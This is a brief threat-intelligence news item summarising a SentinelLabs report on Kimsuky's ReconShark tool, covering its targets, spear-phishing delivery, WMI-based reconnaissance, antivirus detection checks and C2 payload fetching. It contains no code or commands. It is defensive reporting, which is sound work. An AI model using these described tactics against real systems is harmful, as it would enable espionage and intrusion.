Go to listing page

Kimsuky Enhances its BabyShark Recon Tool in a Global Campaign

Kimsuky Enhances its BabyShark Recon Tool in a Global Campaign
The North Korean-linked hacker group Kimsuky, aka Thallium, SmokeScreen, and Velvet Chollima, has once again exhibited its zeal for trying new tools and tactics. It has come up with a new reconnaissance tool called ReconShark. Moreover, to lure its global victims, it is using various geopolitical current affairs, such as nuclear agendas between China and North Korea and the Russia-Ukraine conflict.

Who’s on the target?

SentinelLabs reported that in the recent campaign, Kimsuky is targeting organizations across the globe.
  • One of its targets includes the staff of Korea Risk Group (KRG), an IT firm dealing with the analysis of matters impacting the Democratic People’s Republic of Korea (DPRK).
  • The same campaign has been further expanded to target government entities, think tanks, and research universities in the U.S., Europe, and Asia.

About the ReconShark

Kimsuky has upgraded its BabyShark malware into ReconShark, further expanding its exfiltration capabilities.
  • It can steal sensitive data from the infected system, including running processes, connected batteries, and endpoint threat detection mechanisms.
  • It further abuses the Windows Management Instrumentation (WMI) to extract system information.
  • It checks for the presence of endpoint security software, including Trend Micro OfficeScan, Kaspersky Internet Security, Malwarebytes Anti-Malware, and Norton Security.
  • Additionally, ReconShark fetches further payloads from the C2 and deploys them via scripts (HTA, Windows Batch, or VBS) or macro-enabled Office documents.
  • The malware is delivered to the targeted individuals via spear-phishing emails, OneDrive links pointing toward malicious documents, or malicious macros.

Concluding notes

In addition to data exfiltration, Kimsuky has equipped ReconShark with additional capabilities to detect security software and hardware information. This allows it to target its victims with enhanced precision by exploiting the platform's vulnerabilities and evading defenses. For protection against this threat, the best bet is securing critical assets and staying aware of the latest tactics used by the adversary.
Cyware Publisher

Publisher

Cyware